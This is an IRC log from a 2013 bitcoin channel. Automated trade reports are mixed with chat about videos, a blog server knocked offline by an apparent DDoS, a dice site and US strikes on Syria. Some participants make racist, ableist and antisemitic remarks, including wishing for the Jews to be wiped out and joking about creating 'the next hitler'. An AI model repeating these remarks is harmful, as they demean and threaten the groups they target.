[BTCTC] [LABCOIN] 450 @ 0.003744 = 1.6848 BTC [+] Sep 10 04:58:19 [BTCTC] [LABCOIN] 1720 @ 0.003749 = 6.4483 BTC [+] Sep 10 04:58:21 [BTCTC] [LABCOIN] 820 @ 0.00375 = 3.075 BTC [+] Sep 10 04:58:39 that reminds me of one of my first websites visited ever, http://www.tsgk.net/cowboyz/tdcindex.html (French only) Sep 10 04:58:46 a parody of everything lame at the time Sep 10 04:59:05 trou du cul ? Sep 10 04:59:06 ahahah Sep 10 04:59:16 some things are still relevant Sep 10 04:59:17 what is ed? Sep 10 04:59:23 @mircea_popescu Sep 10 04:59:34 khalunis https://encyclopediadramatica.se/Trolltalk Sep 10 04:59:34 [BTCTC] [ACTIVEMINING] 721 @ 0.00335 = 2.4154 BTC [-] Sep 10 04:59:39 oh yrp Sep 10 04:59:42 i blame it all on ThickAsThieves, he reminded me. Sep 10 05:00:22 [BTCTC] [KENILWORTH] 23 @ 0.00178 = 0.0409 BTC [+] Sep 10 05:01:55 [BTCTC] [LABCOIN] 642 @ 0.003749 = 2.4069 BTC [-] Sep 10 05:02:19 [HAVELOCK] [AM100] 15 @ 0.02319588 = 0.3479 BTC [+] Sep 10 05:02:54 q Sep 10 05:03:02 [HAVELOCK] [AM100] 20 @ 0.023196 = 0.4639 BTC [+] Sep 10 05:03:09 ugh Sep 10 05:03:18 [BTCTC] [ACTIVEMINING] 2 @ 0.0033 = 0.0066 BTC [-] Sep 10 05:03:18 [BTCTC] [ACTIVEMINING] 174 @ 0.00326 = 0.5672 BTC [-] Sep 10 05:03:20 [BTCTC] [ACTIVEMINING] 46 @ 0.003255 = 0.1497 BTC [-] Sep 10 05:05:55 [BTCTC] [LABCOIN] 192 @ 0.003749 = 0.7198 BTC [-] Sep 10 05:06:43 [MPEX] [S.MPOE] 1752 @ 0.00088946 = 1.5583 BTC [+] Sep 10 05:06:45 [MPEX] [S.MPOE] 498 @ 0.00089141 = 0.4439 BTC [+] Sep 10 05:06:51 [HAVELOCK] [AM100] 15 @ 0.023196 = 0.3479 BTC [+] Sep 10 05:09:21 [HAVELOCK] [HIM] 4 @ 0.137 = 0.548 BTC [-] Sep 10 05:10:42 yup. ugh. Sep 10 05:11:42 [BTCTC] [LABCOIN] 7 @ 0.003749 = 0.0262 BTC [-] Sep 10 05:13:55 http://www.youtube.com/embed/NgoyVRO0A0E < this kicks all ass. Sep 10 05:13:59 How to Twerk | Club Dance Moves - YouTube Sep 10 05:14:06 woman explains things in easy to understand manner. Sep 10 05:14:28 [HAVELOCK] [AM100] 100 @ 0.023196 = 2.3196 BTC [+] Sep 10 05:14:56 already saw that video. not sure how it happened Sep 10 05:15:46 I can't even squat Sep 10 05:16:59 [HAVELOCK] [AM100] 50 @ 0.023196 = 1.1598 BTC [+] Sep 10 05:17:11 this is basically all the chicks in rap videos do is it. Sep 10 05:17:32 we need to invent a twerk for boobs Sep 10 05:17:37 I'm not much of an ass man Sep 10 05:19:18 there is. the spanish thing. Sep 10 05:19:26 hahaha Sep 10 05:20:46 [BTCTC] [PETA-MINE] 2 @ 0.6599 = 1.3198 BTC [+] Sep 10 05:21:50 [BTCTC] [LABCOIN] 95 @ 0.003749 = 0.3562 BTC [-] Sep 10 05:25:06 what's wrong with the classic striptease? Sep 10 05:25:07 mircea_popescu will now require all of his hoes to twerk Sep 10 05:25:21 why do we have to invent this useless bullshit, give it a fancy name and then popularize the crap out of it? Sep 10 05:25:29 oh. that's right. massive numbers of idiots and their "ideas". Sep 10 05:25:47 plus bizarre american television & sexual standards Sep 10 05:26:41 because black people Sep 10 05:26:42 jk Sep 10 05:26:45 yay racism Sep 10 05:32:36 way to overexplain the joke thestringpuller Sep 10 05:34:11 thejokekiller Sep 10 05:34:56 [BTCTC] [DMS.SELLING] 110 @ 0.0095 = 1.045 BTC [-] Sep 10 05:35:45 thestringpuller nah, they bellydance. Sep 10 05:35:57 it's what twerking seems to have been copied off anyway Sep 10 05:36:15 bellydance is much much sexier Sep 10 05:36:22 if the girl is any good, yes. Sep 10 05:37:15 basically this twerk thing is a sort of fastfood for dancing. Sep 10 05:37:28 with butts made of fast food Sep 10 05:37:32 and i think that youtube vid was pretty illustrative of the whole thing : Sep 10 05:37:44 [BTCTC] [LABCOIN] 12 @ 0.003749 = 0.045 BTC [-] Sep 10 05:37:50 it's trying to bring marginal retards in the 70-80 range back into some semblance of economic viability. Sep 10 05:38:29 much like mcd is all about bringing the previously discarded bits into "human" consumption. Sep 10 05:42:05 [BTCTC] [ACTIVEMINING] 4 @ 0.003295 = 0.0132 BTC [+] Sep 10 05:42:07 [BTCTC] [ACTIVEMINING] 153 @ 0.003294 = 0.504 BTC [-] Sep 10 05:42:07 [BTCTC] [ACTIVEMINING] 38 @ 0.003292 = 0.1251 BTC [-] Sep 10 05:42:30 [BTCTC] [LABCOIN] 250 @ 0.003749 = 0.9373 BTC [-] Sep 10 05:43:25 again with the ugh Sep 10 05:43:25 [BTCTC] [DMS.SELLING] 95 @ 0.0095 = 0.9025 BTC [-] Sep 10 05:43:55 https://www.youtube.com/watch?v=yaHS2YaNPBw I really like Pentaphobe, I discovered much later people were dancing to it Sep 10 05:43:56 Kahina Spirit Bellydance / Pentaphobe - Right in the Eyeball - YouTube Sep 10 05:43:59 [BTCTC] [LTC-ATF.B2] 30 @ 0.01045 = 0.3135 BTC [-] Sep 10 05:44:35 [BTCTC] [ACTIVEMINING] 134 @ 0.003263 = 0.4372 BTC [-] Sep 10 05:44:36 [BTCTC] [ACTIVEMINING] 38 @ 0.00326 = 0.1239 BTC [-] Sep 10 05:44:38 [BTCTC] [ACTIVEMINING] 24 @ 0.003256 = 0.0781 BTC [-] Sep 10 05:44:39 [BTCTC] [ACTIVEMINING] 97 @ 0.003255 = 0.3157 BTC [-] Sep 10 05:44:40 [BTCTC] [ACTIVEMINING] 50 @ 0.003254 = 0.1627 BTC [-] Sep 10 05:44:41 [BTCTC] [ACTIVEMINING] 45 @ 0.003251 = 0.1463 BTC [-] Sep 10 05:44:42 [BTCTC] [ACTIVEMINING] 512 @ 0.00325 = 1.664 BTC [-] Sep 10 05:45:43 benkay ima hound poor Duffer1 into the ground with the movement thing Sep 10 05:46:05 [BTCTC] [TAT.ASICMINER] 6 @ 0.02296 = 0.1378 BTC [+] Sep 10 05:46:09 pankkake that's one sultry hawt chick. Sep 10 05:46:40 mircea_popescu: I can't say as I understand what you're going on about. Sep 10 05:47:01 benkay you read today's chatlog ? Sep 10 05:47:08 [BTCTC] [LABCOIN] 39 @ 0.003749 = 0.1462 BTC [-] Sep 10 05:47:25 i've been keeping abreast, but am failing to draw the connection. Sep 10 05:47:50 well let's see. i took your "again with the ugh" to refer to [BTCTC] [LABCOIN] 250 @ 0.003749 = 0.9373 BTC [-]. Sep 10 05:47:58 hah no. Sep 10 05:48:16 well then :) Sep 10 05:48:18 but that was a good bet Sep 10 05:48:22 i have actually filtered assbot Sep 10 05:48:41 there are like 3 assets I care about Sep 10 05:48:46 "care" Sep 10 05:48:54 in which I am interested. Sep 10 05:49:10 and i only really look at them once a month or so Sep 10 05:49:18 omfg you sound like an investor. Sep 10 05:49:24 someone ban him kthx Sep 10 05:49:37 lol Sep 10 05:50:10 anyway. im in a giggly intoxicated mood, better get off before i break more stuff. Sep 10 05:50:11 i certainly categorically do not day trade. Sep 10 05:50:20 buh bye Sep 10 05:52:40 [HAVELOCK] [AM100] 115 @ 0.023196 = 2.6675 BTC [+] Sep 10 05:56:23 [BTCTC] [TAT.ASICMINER] 6 @ 0.02296 = 0.1378 BTC [+] Sep 10 05:59:48 lol mircea_popescu is in a giggly intoxicated mood? Sep 10 06:00:16 [BTCTC] [CB.IDIFF-E] 5 @ 0.025 = 0.125 BTC [+] Sep 10 06:01:38 [BTCTC] [ASICMINER-PT] 1 @ 2.376 BTC [-] Sep 10 06:03:35 [BTCTC] [CB.IDIFF-E] 2 @ 0.025 = 0.05 BTC [+] Sep 10 06:04:24 [HAVELOCK] [XBOND] 1 @ 0.00114001 BTC [-] Sep 10 06:04:26 [HAVELOCK] [XBOND] 100 @ 0.00114 = 0.114 BTC [-] Sep 10 06:07:37 [HAVELOCK] [AM100] 50 @ 0.023195 = 1.1598 BTC [-] Sep 10 06:09:29 mircea_popescu: trilema is down? Sep 10 06:10:18 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0006 BTC [-] Sep 10 06:12:46 [BTCTC] [LABCOIN] 118 @ 0.003681 = 0.4344 BTC [-] Sep 10 06:12:47 [BTCTC] [LABCOIN] 31 @ 0.00368 = 0.1141 BTC [-] Sep 10 06:12:49 [BTCTC] [LABCOIN] 324 @ 0.003678 = 1.1917 BTC [-] Sep 10 06:12:49 [BTCTC] [LABCOIN] 333 @ 0.003676 = 1.2241 BTC [-] Sep 10 06:12:50 [BTCTC] [LABCOIN] 1000 @ 0.003675 = 3.675 BTC [-] Sep 10 06:12:51 [BTCTC] [LABCOIN] 50 @ 0.003663 = 0.1832 BTC [-] Sep 10 06:12:52 [BTCTC] [LABCOIN] 150 @ 0.003662 = 0.5493 BTC [-] Sep 10 06:12:53 [BTCTC] [LABCOIN] 50 @ 0.003636 = 0.1818 BTC [-] Sep 10 06:12:54 [BTCTC] [LABCOIN] 150 @ 0.003635 = 0.5453 BTC [-] Sep 10 06:12:56 [BTCTC] [LABCOIN] 100 @ 0.003626 = 0.3626 BTC [-] Sep 10 06:12:57 [BTCTC] [LABCOIN] 244 @ 0.003626 = 0.8847 BTC [-] Sep 10 06:12:58 [BTCTC] [LABCOIN] 732 @ 0.003625 = 2.6535 BTC [-] Sep 10 06:12:59 [BTCTC] [LABCOIN] 32 @ 0.003623 = 0.1159 BTC [-] Sep 10 06:12:59 [BTCTC] [LABCOIN] 96 @ 0.003622 = 0.3477 BTC [-] Sep 10 06:13:00 [BTCTC] [LABCOIN] 296 @ 0.003605 = 1.0671 BTC [-] Sep 10 06:13:01 [BTCTC] [LABCOIN] 800 @ 0.003604 = 2.8832 BTC [-] Sep 10 06:13:02 [BTCTC] [LABCOIN] 90 @ 0.003604 = 0.3244 BTC [-] Sep 10 06:13:03 [BTCTC] [LABCOIN] 1933 @ 0.003602 = 6.9627 BTC [-] Sep 10 06:13:04 [BTCTC] [LABCOIN] 2000 @ 0.003601 = 7.202 BTC [-] Sep 10 06:13:05 [BTCTC] [LABCOIN] 3800 @ 0.0036 = 13.68 BTC [-] Sep 10 06:13:06 [BTCTC] [LABCOIN] 1 @ 0.0036 BTC [-] Sep 10 06:13:07 [BTCTC] [LABCOIN] 33 @ 0.003595 = 0.1186 BTC [-] Sep 10 06:13:08 [BTCTC] [LABCOIN] 99 @ 0.003594 = 0.3558 BTC [-] Sep 10 06:13:08 [BTCTC] [LABCOIN] 3800 @ 0.003592 = 13.6496 BTC [-] Sep 10 06:13:10 [BTCTC] [LABCOIN] 1000 @ 0.003591 = 3.591 BTC [-] Sep 10 06:13:11 [BTCTC] [LABCOIN] 100 @ 0.003591 = 0.3591 BTC [-] Sep 10 06:13:12 [BTCTC] [LABCOIN] 300 @ 0.003591 = 1.0773 BTC [-] Sep 10 06:13:13 [BTCTC] [LABCOIN] 2680 @ 0.00359 = 9.6212 BTC [-] Sep 10 06:14:22 [BTCTC] [ACTIVEMINING] 8 @ 0.003254 = 0.026 BTC [+] Sep 10 06:14:23 [BTCTC] [ACTIVEMINING] 134 @ 0.003253 = 0.4359 BTC [-] Sep 10 06:14:23 dat much-vaunted eastern european uptime Sep 10 06:14:24 [BTCTC] [ACTIVEMINING] 241 @ 0.00325 = 0.7833 BTC [-] Sep 10 06:14:25 [BTCTC] [ACTIVEMINING] 1017 @ 0.00325 = 3.3053 BTC [-] Sep 10 06:14:37 "uptime guaranteed or we shoot a neckbeard" Sep 10 06:14:39 sell is the new hold Sep 10 06:14:50 thestringpuller: naaaahmmean? Sep 10 06:15:17 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [+] Sep 10 06:15:30 [BTCTC] [DMS.MINING] 1 @ 0.0026 BTC [-] Sep 10 06:17:23 benkay trilema's in atlanta iirc. Sep 10 06:17:36 and motherfucker dobn't tell me that server died again. Sep 10 06:17:49 [BTCTC] [LABCOIN] 1 @ 0.003741 BTC [+] Sep 10 06:19:33 bah ffs. Sep 10 06:19:56 some servers are cursed Sep 10 06:20:03 im starting to think so. Sep 10 06:20:19 if it goes into fsck again and everything... Sep 10 06:20:32 it's my genuine experience. I like dedicated hosting but sometimes you get the bad apple Sep 10 06:20:47 pankkake this is a server just for keeping a buncha blogs online Sep 10 06:21:17 wtf am i going to do here, a machine for s.mg, a bunch of machines for mpex and a dedicated machine for a fucking wordpress install ? Sep 10 06:21:30 my secondary ns/mx server was going down all the time, and it was doing almost nothing Sep 10 06:21:47 this is getting some traffic, but nothing that should kill it in any sort of sense. Sep 10 06:22:29 virtualization is a thing these days Sep 10 06:22:36 abstracts these problems Sep 10 06:22:49 [MPEX] [S.MPOE] 100 @ 0.00088916 = 0.0889 BTC [-] Sep 10 06:22:51 [MPEX] [S.MPOE] 5306 @ 0.0008886 = 4.7149 BTC [-] Sep 10 06:23:03 [MPEX] [S.MPOE] 15294 @ 0.00088847 = 13.5883 BTC [-] Sep 10 06:23:10 there is no free lunch. Sep 10 06:23:17 you can't "abstract" your problems away. Sep 10 06:23:56 I dislike virtualization in general but it is useful for small servers you don't have to care about Sep 10 06:24:17 I know it has like ten hard drives and someone is going to take care of them Sep 10 06:24:40 and I'm just riding a small part of it Sep 10 06:24:47 that's about my situation really. Sep 10 06:25:07 im not the sysadmin or anything. i guess you could say the only reason it's not virtualised is cause i know the server/who runs it. Sep 10 06:25:25 of course you have to understand the owner of the server can do everything he wants Sep 10 06:26:11 I bet there is a lot of AWS in the bitcoin world Sep 10 06:26:15 [HAVELOCK] [DEALCO] 100 @ 0.01074 = 1.074 BTC [+] Sep 10 06:26:35 https://bitcointalk.org/index.php?topic=248396.660 now people are speculating on what was the scam Sep 10 06:26:56 as he didn't take any forumer's money Sep 10 06:32:35 I don't think it's scam like that Sep 10 06:33:54 ok so this is a ddos Sep 10 06:34:09 now who exactly would be ddosing trilema and why in the hell. Sep 10 06:34:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.02188 = 0.0438 BTC [-] Sep 10 06:37:25 [BTCTC] [ACTIVEMINING] 101 @ 0.00326 = 0.3293 BTC [+] Sep 10 06:37:50 For the lulz Sep 10 06:37:51 [BTCTC] [ACTIVEMINING] 99 @ 0.003257 = 0.3224 BTC [-] Sep 10 06:38:15 in retrospect i did just rub it in earlier. Sep 10 06:38:16 a well. Sep 10 06:39:11 blog back sometime tomorrow. if ddos thoroughput warrants it / sysadmin ppl can't filter or w/e i'll move it to some beefier machine. Sep 10 06:39:25 meanwhile, im off to bed. everyone refer to your offline copies for interim lulz. Sep 10 06:40:11 i got copy on minidisc archive and will surely study tonight **** BEGIN LOGGING AT Tue Sep 10 12:41:48 2013 Sep 10 12:45:00 [BTCTC] [LABCOIN] 10 @ 0.003672 = 0.0367 BTC [-] Sep 10 12:45:00 [BTCTC] [LABCOIN] 5 @ 0.003673 = 0.0184 BTC [+] Sep 10 12:45:05 [BTCTC] [LABCOIN] 5 @ 0.003675 = 0.0184 BTC [+] Sep 10 12:45:05 [BTCTC] [LABCOIN] 384 @ 0.003679 = 1.4127 BTC [+] Sep 10 12:45:05 [BTCTC] [LABCOIN] 191 @ 0.003681 = 0.7031 BTC [+] Sep 10 12:47:32 [BTCTC] [LABCOIN] 10 @ 0.003676 = 0.0368 BTC [-] Sep 10 12:50:54 [HAVELOCK] [AM100] 1 @ 0.023196 BTC [-] Sep 10 13:01:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.02201 = 0.044 BTC [-] Sep 10 13:01:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.022 = 0.22 BTC [-] Sep 10 13:03:06 [BTCTC] [ASICMINER-PT] 2 @ 2.282 = 4.564 BTC [-] Sep 10 13:03:07 [BTCTC] [ASICMINER-PT] 1 @ 2.282 BTC [-] Sep 10 13:03:38 [BTCTC] [LABCOIN] 5 @ 0.003601 = 0.018 BTC [-] Sep 10 13:03:39 [BTCTC] [LABCOIN] 1000 @ 0.0036 = 3.6 BTC [-] Sep 10 13:07:47 [BTCTC] [LABCOIN] 5 @ 0.003559 = 0.0178 BTC [-] Sep 10 13:07:49 [BTCTC] [LABCOIN] 367 @ 0.003558 = 1.3058 BTC [-] Sep 10 13:10:54 [BTCTC] [ASICMINER-PT] 1 @ 2.304 BTC [+] Sep 10 13:10:56 [BTCTC] [ASICMINER-PT] 2 @ 2.305 = 4.61 BTC [+] Sep 10 13:13:33 [BTCTC] [LABCOIN] 300 @ 0.0036 = 1.08 BTC [+] Sep 10 13:13:49 [BTCTC] [ASICMINER-PT] 1 @ 2.32 BTC [+] Sep 10 13:15:25 http://www.forexminute.com/bitcoin/the-smartest-man-in-bitcoin-erik-voorhees-and-his-investments-14707 Sep 10 13:15:28 OUR HERO Sep 10 13:15:39 hehe cool. Sep 10 13:19:31 o looky. davout how goes frenchland ? Sep 10 13:21:44 [BTCTC] [ACTIVEMINING] 383 @ 0.003275 = 1.2543 BTC [-] Sep 10 13:21:45 [BTCTC] [ACTIVEMINING] 150 @ 0.003275 = 0.4913 BTC [-] Sep 10 13:22:00 [BTCTC] [ACTIVEMINING] 901 @ 0.003257 = 2.9346 BTC [-] Sep 10 13:22:18 [BTCTC] [ACTIVEMINING] 146 @ 0.003255 = 0.4752 BTC [-] Sep 10 13:22:34 [BTCTC] [ACTIVEMINING] 44 @ 0.00325 = 0.143 BTC [-] Sep 10 13:27:19 mircea_popescu: hey Sep 10 13:27:27 ;) Sep 10 13:27:38 france is pretty french, business as usual Sep 10 13:51:18 "What of "terrorism"? Will mandatory anti-terrorism software, provided to Microsoft by the federal government, monitor and report my computerized activities to the Department of Homeland Security for review?" Sep 10 13:51:21 the naivite of 2005. Sep 10 13:51:25 http://glyf.livejournal.com/46589.html Sep 10 13:52:07 [HAVELOCK] [XBOND] 71 @ 0.001125 = 0.0799 BTC [-] **** ENDING LOGGING AT Tue Sep 10 14:09:21 2013 **** BEGIN LOGGING AT Tue Sep 10 14:09:45 2013 **** ENDING LOGGING AT Tue Sep 10 14:10:04 2013 **** BEGIN LOGGING AT Wed Sep 11 03:50:56 2013 Sep 11 03:56:49 so what's new ? Sep 11 03:57:40 crowdsourced web design Sep 11 03:57:57 burnside said labcoin shares are unsold, selloff followed immediately after Sep 11 03:58:05 [HAVELOCK] [AM100] 2 @ 0.021 = 0.042 BTC [+] Sep 11 03:58:19 scam are scams, balls, funny pictures Sep 11 03:58:20 [BTCTC] [KENILWORTH] 75 @ 0.001775 = 0.1331 BTC [-] Sep 11 03:58:24 aha Sep 11 03:58:26 not enough gifs today Sep 11 03:58:28 !t btctc labcoin Sep 11 03:58:30 [BTCT:LABCOIN] 1D: 0.0031 / 0.00349 / 0.003897 (331689 shares, 1158.3 BTC), 7D: 0.002971 / 0.00349 / 0.003989 (1826768 shares, 6383.7 BTC), 30D: 0.001219 / 0.00279 / 0.003989 (10424155 shares, 29039 BTC) Sep 11 03:58:46 -assets thinks you dress poorly, mp. Sep 11 03:58:53 [BTCTC] [LABCOIN] 8 @ 0.003548 = 0.0284 BTC [+] Sep 11 03:58:54 [BTCTC] [LABCOIN] 4 @ 0.003549 = 0.0142 BTC [+] Sep 11 03:58:56 [BTCTC] [LABCOIN] 366 @ 0.003571 = 1.307 BTC [+] Sep 11 03:58:56 ;) Sep 11 03:58:57 [BTCTC] [LABCOIN] 732 @ 0.003573 = 2.6154 BTC [+] Sep 11 03:58:58 [BTCTC] [LABCOIN] 490 @ 0.003595 = 1.7616 BTC [+] Sep 11 03:58:59 [BTCTC] [LABCOIN] 95 @ 0.003596 = 0.3416 BTC [+] Sep 11 03:59:00 [BTCTC] [LABCOIN] 150 @ 0.003598 = 0.5397 BTC [+] Sep 11 03:59:05 benkay well i can't compete in all the fields. Sep 11 04:00:18 let me be a bitch and poke Duffer1 moar. Sep 11 04:00:25 it's quite the jacket you're wearing in that video from a few years back. the timis training... Sep 11 04:01:00 the one where i tell neuman what liberalism is or the one with a bunch of farm folk ? Sep 11 04:01:29 i can't parse what you're saying but possibly Sep 11 04:01:37 what you were saying in the video I mean Sep 11 04:01:52 the video was with the farm/homeless guys Sep 11 04:02:16 ah. i can't even recall, i think i was wearing a coat on account of their overactive AC. Sep 11 04:02:29 "pastor mp" Sep 11 04:02:32 on vimeo Sep 11 04:02:33 i think Sep 11 04:02:35 right at the intersection of gangster and wtf Sep 11 04:02:40 like a purple suit Sep 11 04:02:49 and a chalice mounted on a cane Sep 11 04:02:53 so, a pimp? Sep 11 04:03:16 that would be explaining the joke, yes. Sep 11 04:03:23 oh :( Sep 11 04:03:33 do you want to draw the line all the way to mp's personal life as well and ruin the whole operation? Sep 11 04:03:45 [BTCTC] [LABCOIN] 315 @ 0.003595 = 1.1324 BTC [-] Sep 11 04:03:46 [BTCTC] [LABCOIN] 211 @ 0.003597 = 0.759 BTC [+] Sep 11 04:03:47 lol Sep 11 04:03:48 [BTCTC] [LABCOIN] 1000 @ 0.0036 = 3.6 BTC [+] Sep 11 04:04:07 mp. right at the intersection of gangster and wtf. Sep 11 04:04:17 since 2011. Sep 11 04:04:31 that recently? Sep 11 04:04:36 well it's the internet. Sep 11 04:04:47 it all started in 2011. Sep 11 04:04:53 if you say so al gore Sep 11 04:05:37 you know if the weirdo moon korean guy was smart he'd have had Sep 11 04:05:59 a joint name change solemnity when al gore could have changed to al core just as the fat german kid changed to mega. Sep 11 04:07:03 mega which is dead on arrival btw Sep 11 04:07:14 because retroshare. Sep 11 04:07:16 anyway, this is the other one vimeo.com/5236831 Sep 11 04:07:19 [BTCTC] [BTC-GOLD] 1 @ 0.00549 BTC [+] Sep 11 04:07:20 [BTCTC] [BTC-GOLD] 10 @ 0.0055 = 0.055 BTC [+] Sep 11 04:07:48 http://en.wikipedia.org/wiki/Victor_Neumann that's the guy im trolling there. Sep 11 04:08:01 Conference "liberal influence the future of Romania" hmm Sep 11 04:08:27 at least he has a wikipedia page Sep 11 04:08:45 pankkake don't hold that against him Sep 11 04:09:03 occasionally wikipedia lists innocent people who aren't footballers or tv "famous" Sep 11 04:09:22 pankkake: sometimes those "innocent people" pay for the wikipedia page out of vanity. Sep 11 04:09:49 wikipedia deleters are very active Sep 11 04:10:01 so are bitcointalk visitors Sep 11 04:10:07 don't mean a damn thing Sep 11 04:10:21 Neumann was also head of research at the École Pratique des Hautes Études in Paris Sep 11 04:10:22 so there. Sep 11 04:10:42 I'm sure MP would love to be on wikipedia Sep 11 04:10:53 i don't like wikipedia. Sep 11 04:11:06 well, happy 9/11 guys Sep 11 04:11:16 ah, that was what I was looking for: "it happens I’m a well known Romanian bloger, well trusted and all." Sep 11 04:11:16 mazel tov. Sep 11 04:11:39 but isn't even on ro.wikipedia! Sep 11 04:12:39 mircea_popescu: http://www.innerportrait.blogspot.de/ < that's unrelated to you, right? Sep 11 04:12:42 look in jp.wikipedia Sep 11 04:13:01 dexX7 yeah, some artsy dude. Sep 11 04:13:11 same name, yup Sep 11 04:13:23 he's not bad actually, i think we met once cause i saw my name on some paintings on the wall at this sushi place i used to go to Sep 11 04:13:35 and i was all wtf. Sep 11 04:14:50 [MPEX] [S.MPOE] 6416 @ 0.00088432 = 5.6738 BTC [-] Sep 11 04:14:53 [MPEX] [S.MPOE] 1084 @ 0.00088096 = 0.955 BTC [-] Sep 11 04:15:57 http://trilema.com/2013/anonimity-not-for-the-poor/#comment-94958 if anyone wants to follow the exchange of longest comments on the internets. Sep 11 04:15:58 obama live on tv saying hes gonna strike syria regardless of public and congressional sentiment Sep 11 04:16:00 Anonimity : not for the poor. pe Trilema - Un blog de Mircea Popescu. Sep 11 04:16:16 ThickAsThieves he might end up with a military coup at the rate he's going. Sep 11 04:16:41 i never heard of a soviet state figurehead surviving the loss of support of the secret services, and he's fucked on that fronth since summer. Sep 11 04:16:49 oh bummer Sep 11 04:18:02 he asked Congress to postpone vote Sep 11 04:18:55 house polls as 251 no votes Sep 11 04:19:07 a French parodic blog said "Obama asked to give his nobel peace prize to Putin" Sep 11 04:19:12 senate polls 38ish No Sep 11 04:19:22 [HAVELOCK] [AM100] 30 @ 0.021 = 0.63 BTC [+] Sep 11 04:20:02 today would be perfect for a preemptive strike by syria Sep 11 04:20:18 preempting what... Sep 11 04:20:24 new york would be ideal Sep 11 04:20:32 dub lol if they had the range they might consider it. Sep 11 04:20:37 the bombing of all their weapons likely Sep 11 04:20:40 they sould adopt the bush doctrine and attack first, clearly Sep 11 04:20:52 and if they had the sense to strike washington rather than ny everyone us side would sigh a breath of relief. Sep 11 04:20:57 [BTCTC] [PETA-MINE] 17 @ 0.6599 = 11.2183 BTC [+] Sep 11 04:20:59 hahahah Sep 11 04:21:05 truth Sep 11 04:21:06 strike with what, their subs? Sep 11 04:21:17 or some dirty bombs Sep 11 04:21:20 jorash syria has some russian made mid range rocketry. Sep 11 04:21:31 dirty bomb hidden in a turban Sep 11 04:21:35 they could strike about as far as austria iirc. Sep 11 04:21:41 if syria russi and china fuck up america do we still have to aml? Sep 11 04:21:47 their only strikes will be on their neighbors, and maybe they'll attempt the warboats in Med Sep 11 04:22:11 we can dream though Sep 11 04:22:31 well, you never know, the russians might use the opportunity to blast a coupla missiles from syria at the future us shield bases Sep 11 04:22:32 Syria will shoot something at Israel, and that'll be the end of Syria.. Sep 11 04:22:36 plucky little syrian striking at the heart of the great satan Sep 11 04:23:02 [BTCTC] [DMS.MINING] 1 @ 0.002615 BTC [+] Sep 11 04:23:34 I think this negotiation will go through though, they'll get rid of their WMDs (except for some hidden caches) Sep 11 04:23:53 >saying WMD with a straight face Sep 11 04:24:04 sarin = WMD Sep 11 04:25:29 ideally Syria will wipe out the jews, russia takes care of yankees Sep 11 04:25:59 you can;t wipe out the jews, they're older than time Sep 11 04:26:04 its been tried Sep 11 04:26:14 lol Sep 11 04:26:22 it'll happen sooner or later Sep 11 04:26:37 yea, a meteor will do it (and everyone else0 Sep 11 04:26:44 thats about your only chance fo rthat Sep 11 04:27:43 anyone want to do an ipo to create the next hitler? Sep 11 04:27:55 dub, see Yom Kippur war Sep 11 04:29:29 clivepalmer, I'm not sure if hitler was succesful in his goals Sep 11 04:29:38 jorash nobody negotiates with the us anymore, because it doesn't pay to negotiate with terrorists. Sep 11 04:33:01 https://letsdice.com/?invite_info=137.1378949569.2fa524d84e1c6ac4e69326b00206ef23 Sep 11 04:33:12 if anyone wants to take a look Sep 11 04:33:38 I did. it's not bad, but nothing very compelling compared to JD Sep 11 04:34:07 [HAVELOCK] [CBTC] 3957 @ 0.0002999 = 1.1867 BTC [-] Sep 11 04:34:10 i'm once again surprised that there is "something" Sep 11 04:34:14 and it's really not that bad Sep 11 04:34:39 yes I don't understand why they didn't just wait 5 days before asking for funds Sep 11 04:35:09 if I ever do it will be after like 3 months of public beta Sep 11 04:35:12 pankkake i think they simply didn't think it through. Sep 11 04:35:32 [BTCTC] [BMF] 1 @ 0.02 BTC [+] Sep 11 04:35:33 [BTCTC] [BMF] 1 @ 0.0257 BTC [+] Sep 11 04:35:34 [BTCTC] [BMF] 1 @ 0.03 BTC [+] Sep 11 04:35:35 the thing they didn't copy from JD is the invest/divest, it's shares Sep 11 04:36:41 I'm running the auto bet with defaults and winning Sep 11 04:37:30 pretty sneaky from them Sep 11 04:37:32 [BTCTC] [LABCOIN] 271 @ 0.003635 = 0.9851 BTC [+] Sep 11 04:37:33 [BTCTC] [LABCOIN] 4438 @ 0.003636 = 16.1366 BTC [+] Sep 11 04:37:34 [BTCTC] [LABCOIN] 235 @ 0.003637 = 0.8547 BTC [+] Sep 11 04:37:36 [BTCTC] [LABCOIN] 1000 @ 0.00364 = 3.64 BTC [+] Sep 11 04:37:37 [BTCTC] [LABCOIN] 100 @ 0.003646 = 0.3646 BTC [+] Sep 11 04:37:38 [BTCTC] [LABCOIN] 1000 @ 0.003648 = 3.648 BTC [+] Sep 11 04:37:39 letting you win before it's real money :) Sep 11 04:37:58 that's kinda smarmy. Sep 11 04:38:28 they have the usual provably fair thing Sep 11 04:38:54 you have a graph of your past bets Sep 11 04:39:53 [BTCTC] [LABCOIN] 271 @ 0.003647 = 0.9883 BTC [-] Sep 11 04:40:11 the provably fair thing can be as subtle as good cryptography. Sep 11 04:40:12 [BTCTC] [LABCOIN] 200 @ 0.003647 = 0.7294 BTC [-] Sep 11 04:40:26 [BTCTC] [LABCOIN] 200 @ 0.003647 = 0.7294 BTC [-] Sep 11 04:40:49 [BTCTC] [LABCOIN] 500 @ 0.003649 = 1.8245 BTC [+] Sep 11 04:40:50 [BTCTC] [LABCOIN] 108 @ 0.00365 = 0.3942 BTC [+] Sep 11 04:40:51 [BTCTC] [LABCOIN] 1500 @ 0.003651 = 5.4765 BTC [+] Sep 11 04:40:53 [BTCTC] [LABCOIN] 2880 @ 0.003652 = 10.5178 BTC [+] Sep 11 04:40:54 [BTCTC] [LABCOIN] 200 @ 0.003655 = 0.731 BTC [+] Sep 11 04:40:55 [BTCTC] [LABCOIN] 100 @ 0.003677 = 0.3677 BTC [+] Sep 11 04:40:56 [BTCTC] [LABCOIN] 100 @ 0.003692 = 0.3692 BTC [+] Sep 11 04:40:57 [BTCTC] [LABCOIN] 3458 @ 0.003692 = 12.7669 BTC [+] Sep 11 04:40:58 [BTCTC] [LABCOIN] 2500 @ 0.003693 = 9.2325 BTC [+] Sep 11 04:40:59 [BTCTC] [LABCOIN] 5654 @ 0.003702 = 20.9311 BTC [+] Sep 11 04:41:02 according to dooglus their "jackpot" is provably unfair to high betters Sep 11 04:41:48 I'm still winning! Sep 11 04:41:56 I hope this won't 